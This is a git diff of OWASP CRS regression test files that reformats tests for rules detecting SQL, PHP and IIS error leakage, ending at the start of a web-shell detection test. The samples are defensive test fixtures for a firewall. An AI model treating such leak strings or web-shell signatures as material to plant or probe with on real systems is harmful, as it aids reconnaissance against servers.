"en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: PHP Warning: mssql_query(): message: Incorrect syntax near 's'. (severity 15) in /Volumes/Data/Users/username/Desktop/createXML.php on line 375"} + output: + log_contains: "id \"951220\"" + - test_id: 2 desc: "Matching mssql SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Conversion failed when converting the varchar value 'secret' to data type int."} - output: - log_contains: "id \"951220\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Conversion failed when converting the varchar value 'secret' to data type int."} + output: + log_contains: "id \"951220\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml index 972e41e9e..085ff639d 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml @@ -1,49 +1,46 @@ --- meta: author: "azurit, Xhoenix" - enabled: true - name: "951230.yaml" description: "Regression tests for rule 951230" +rule_id: 951230 tests: - - test_title: 951230-1 + - test_id: 1 desc: "Matching MySQL SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1772 (HY000): Malformed GTID set specification 'secret_password'."} - output: - log_contains: "id \"951230\"" - - test_title: 951230-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1772 (HY000): Malformed GTID set specification 'secret_password'."} + output: + log_contains: "id \"951230\"" + - test_id: 2 desc: "Matching MySQL SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1105 (HY000): XPATH syntax error: '\\secret'"} - output: - log_contains: "id \"951230\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1105 (HY000): XPATH syntax error: '\\secret'"} + output: + log_contains: "id \"951230\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml index f878fd171..be9ca63e3 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml @@ -1,49 +1,46 @@ --- meta: author: "azurit, Xhoenix" - enabled: true - name: "951240.yaml" description: "Regression tests for rule 951240" +rule_id: 951240 tests: - - test_title: 951240-1 + - test_id: 1 desc: "Matching PostgreSQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: pg_query(): supplied argument is not a valid PostgreSQL link resource in /var/www/sivusto/handler.php on line 56"} - output: - log_contains: "id \"951240\"" - - test_title: 951240-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: pg_query(): supplied argument is not a valid PostgreSQL link resource in /var/www/sivusto/handler.php on line 56"} + output: + log_contains: "id \"951240\"" + - test_id: 2 desc: "Matching PostgreSQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR: invalid input syntax for integer"} - output: - log_contains: "id \"951240\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR: invalid input syntax for integer"} + output: + log_contains: "id \"951240\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml index f711ff813..473ffacda 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951250.yaml" description: "Regression tests for rule 951250" +rule_id: 951250 tests: - - test_title: 951250-1 + - test_id: 1 desc: "Matching SQLite SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: SQLite3::query() [sqlite3.query]: 1 values for 2 columns in /mysite/product.php on line 94"} - output: - log_contains: "id \"951250\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: SQLite3::query() [sqlite3.query]: 1 values for 2 columns in /mysite/product.php on line 94"} + output: + log_contains: "id \"951250\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml index e8f93739f..c26b567bc 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml @@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951260.yaml" description: "Regression tests for rule 951260" +rule_id: 951260 tests: - - test_title: 951260-1 + - test_id: 1 desc: "Matching Sybase SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: Sybase: Server message: Changed database context to 'rdhiman'. (severity 10, procedure N/A) in guestfatch.php on line 10"} - output: - log_contains: "id \"951260\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: Sybase: Server message: Changed database context to 'rdhiman'. (severity 10, procedure N/A) in guestfatch.php on line 10"} + output: + log_contains: "id \"951260\"" diff --git a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml index d4dfc5e5c..d3f6492a4 100644 --- a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml +++ b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml @@ -1,107 +1,101 @@ --- meta: author: "M4tteoP, Esad Cetiner, azurit" - enabled: true - name: "953100.yaml" description: "Tests for rule 953100" +rule_id: 953100 tests: - - test_title: 953100-1 + - test_id: 1 desc: "'File size is' leads to FPs, it should not match at PL1" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - uri: "/post" - data: "Maximum allowed file size is 10 MB" - output: - no_log_contains: id "953100" - - test_title: 953100-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "Maximum allowed file size is 10 MB" + output: + no_log_contains: id "953100" + - test_id: 2 desc: "'Invalid date' Wordpress FP, it should not match at PL1" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - uri: "/post" - data: "Invalid date selected" - output: - no_log_contains: id "953100" - - test_title: 953100-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "Invalid date selected" + output: + no_log_contains: id "953100" + - test_id: 3 desc: "'The function' might lead to FPs, it should not match at PL1" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - uri: "/post" - data: "please review the function" - output: - no_log_contains: id "953100" - - test_title: 953100-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "please review the function" + output: + no_log_contains: id "953100" + - test_id: 4 desc: "'Static function' might lead to FPs, it should not match at PL1" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - uri: "/post" - data: "This is a static function" - output: - no_log_contains: id "953100" - - test_title: 953100-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "This is a static function" + output: + no_log_contains: id "953100" + - test_id: 5 desc: "'cannot be empty is too common for PL1 GH isue #3399" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - uri: "/post" - data: "Field cannot be empty." - output: - no_log_contains: id "953100" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "Field cannot be empty." + output: + no_log_contains: id "953100" diff --git a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml index 57a366f04..c39660999 100644 --- a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml +++ b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml @@ -1,112 +1,106 @@ --- meta: author: "M4tteoP, Esad Cetiner, azurit" - enabled: true - name: "953101.yaml" description: "Tests for rule 953101" +rule_id: 953101 tests: - - test_title: 953101-1 + - test_id: 1 desc: "'File size is' leads to FPs at PL1, it should match at PL2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "Maximum allowed file size is 10 MB"} - output: - log_contains: id "953101" - - test_title: 953101-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "Maximum allowed file size is 10 MB"} + output: + log_contains: id "953101" + - test_id: 2 desc: "'Invalid date' leads to FPs at PL1, it should match at PL2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "Invalid date selected"} - output: - log_contains: id "953101" - - test_title: 953101-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "Invalid date selected"} + output: + log_contains: id "953101" + - test_id: 3 desc: "'The function' might lead to FPs at PL1, it should match at PL2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "Please review the function"} - output: - log_contains: id "953101" - - test_title: 953101-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "Please review the function"} + output: + log_contains: id "953101" + - test_id: 4 desc: "'Static function' might lead to FPs at PL1, it should match at PL2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "This is a static function"} - output: - log_contains: id "953101" - - test_title: 953101-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "This is a static function"} + output: + log_contains: id "953101" + - test_id: 5 desc: "'cannot be empty is too common for PL1, it should match at PL2 GH isue #3399" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "cannot be empty."} - output: - log_contains: id "953101" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "cannot be empty."} + output: + log_contains: id "953101" diff --git a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml index 23d215a47..5070e5e5d 100644 --- a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml +++ b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml @@ -1,151 +1,143 @@ --- meta: author: "fzipi, azurit" - enabled: true - name: "953120.yaml" description: "Positive tests for rule 953120" +rule_id: 953120 tests: - - test_title: 953120-1 + - test_id: 1 desc: "Just something that returns \"}" - output: - log_contains: "id \"953120\"" - - test_title: 953120-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: "{\"body\": \"\"}" + output: + log_contains: "id \"953120\"" + - test_id: 2 desc: "Negative test, returns \"}" - output: - log_contains: "id \"953120\"" - - test_title: 953120-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: "{\"body\": \"\"}" + output: + log_contains: "id \"953120\"" + - test_id: 6 desc: "Negative test, returns \"}" - output: - log_contains: "id \"953120\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: "{\"body\": \"\"}" + output: + log_contains: "id \"953120\"" diff --git a/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml index 4631f2c6f..905f7d154 100644 --- a/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml +++ b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml @@ -1,25 +1,23 @@ --- meta: author: "Andrew Howe" - enabled: true - name: "954100.yaml" description: "Tests for rule 954100" +rule_id: 954100 tests: - - test_title: 954100-1 + - test_id: 1 desc: 'Returns C:\inetpub in the response body' stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: "{\"body\": \"C:\\\\inetpub \\n\"}" - output: - log_contains: "id \"954100\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: "{\"body\": \"C:\\\\inetpub \\n\"}" + output: + log_contains: "id \"954100\"" diff --git a/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml index c57700a45..a9eed253a 100644 --- a/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml +++ b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml @@ -1,45 +1,42 @@ --- meta: author: "Felipe Zipitria, azurit" - enabled: true - name: "954120.yaml" description: "Tests for rule 954120 - IIS Error information disclusure" +rule_id: 954120 tests: - - test_title: 954120-1 + - test_id: 1 desc: 'Match IIS error page' stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.1" - uri: "/reflect" - data: |- - {"body": "text=404.14 - URL too long."} - output: - log_contains: id "954120" - - test_title: 954120-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.1" + uri: "/reflect" + data: |- + {"body": "text=404.14 - URL too long."} + output: + log_contains: id "954120" + - test_id: 2 desc: 'Match IIS error page' stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.1" - uri: "/reflect" - data: |- - {"body": "text=500.15 - Server error: Direct requests for GLOBAL.ASA are not allowed."} - output: - log_contains: id "954120" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.1" + uri: "/reflect" + data: |- + {"body": "text=500.15 - Server error: Direct requests for GLOBAL.ASA are not allowed."} + output: + log_contains: id "954120" diff --git a/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml index 52e743d0b..f052a9dfb 100644 --- a/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml +++ b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml @@ -1,70 +1,66 @@ --- meta: author: "azurit" - enabled: true - name: "955100.yaml" description: "Regression tests for rule 955100" +rule_id: 955100 tests: - - test_title: 955100-1 + - test_id: 1 desc: "Matching web shell NCC Shell" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.1" - uri: "/reflect" - data: |- - {"body": "

